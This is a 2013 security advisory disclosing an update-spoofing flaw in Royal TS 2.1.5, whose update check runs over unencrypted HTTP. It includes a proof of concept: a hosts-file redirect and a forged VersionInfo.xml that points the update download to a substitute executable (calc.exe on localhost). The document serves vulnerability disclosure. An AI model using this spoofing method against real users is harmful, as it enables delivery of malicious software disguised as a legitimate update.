[waraxe-2013-SA#101] - Update Spoofing Vulnerability in Royal TS 2.1.5 =============================================================================== Author: Janek Vind "waraxe" Date: 29. March 2013 Location: Estonia, Tartu Web: http://www.waraxe.us/advisory-101.html Description of vulnerable software: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Royal TS is a simple, yet powerful tool for administrators, developers, system engineers and many other IT focused information workers that supports them in working effortless with their remote systems or management consoles. http://www.royalts.com/main/home/win.aspx Vulnerable is version 2.1.5, other versions not tested. ############################################################################### 1. Update Spoofing Vulnerability ############################################################################### Current version of Royal TS contains security vulnerability in update mechanism, which can be exploited by malicious people to conduct spoofing attacks. When checking for updates, Royal TS issues GET request over HTTP: GET /dl/RoyalTS/VersionInfo.xml?r=9:54:35%20PM HTTP/1.1 Cache-Control: no-cache Host: www.royalts.com Connection: Keep-Alive Server response: HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Fri, 16 Nov 2012 11:13:01 GMT Accept-Ranges: bytes ETag: "d11e6057ebc3cd1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Thu, 28 Mar 2013 19:54:39 GMT Content-Length: 13375 <?xml version="1.0" encoding="utf-8"?> <RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <Major>2</Major> <Minor>1</Minor> <Build>5</Build> <MinorRevision>61116</MinorRevision> <DownloadURL>http://www.royalts.com/dl/RoyalTS/RoyalTSInstaller_2.01.05.61116.msi</DownloadURL> <ReleaseNotes> <html lang="en" xmlns="http://www.w3.org/1999/xhtml">< ... </ReleaseNotes> </RoyalVersionInfo> Royal TS user can click "Start Download" button and Royal TS will open web browser with download starting dialog. Such update mechanism contains security flaw: Update check is done over unencrypted HTTP channel. Malicious third party is able to conduct Man-in-the-Middle (MitM) attacks and spoof server response. In this way it is possible to instruct user to download malicious update. Testing: tests were done using Windows 7 and Apache webserver. Steps: 1. modify "windows/system32/drivers/etc/hosts" file in order to emulate DNS spoofing: 127.0.0.1 www.royalts.com 2. create xml file "/dl/RoyalTS/VersionInfo.xml" to the webserver directory with following content: <?xml version="1.0" encoding="utf-8"?> <RoyalVersionInfo xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"> <Major>2</Major> <Minor>3</Minor> <Build>4</Build> <MinorRevision>61116</MinorRevision> <DownloadURL>http://localhost/calc.exe</DownloadURL> <ReleaseNotes> New version 2.3.4 available! </ReleaseNotes> </RoyalVersionInfo> 3. Place "calc.exe" file to the webserver main directory. 4. Open Royal TS, it will check for updates automatically, resulting in dialog: New version 2.3.4 available! 5. Press "Start Download" button. Default web browser window will be open offering file download: "You have chosen to open calc.exe" Contact: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ come2waraxe@xxxxxxxxx Janek Vind "waraxe" Waraxe forum: http://www.waraxe.us/forums.html Personal homepage: http://www.janekvind.com/ Random project: http://albumnow.com/ ---------------------------------- [ EOF ] ------------------------------------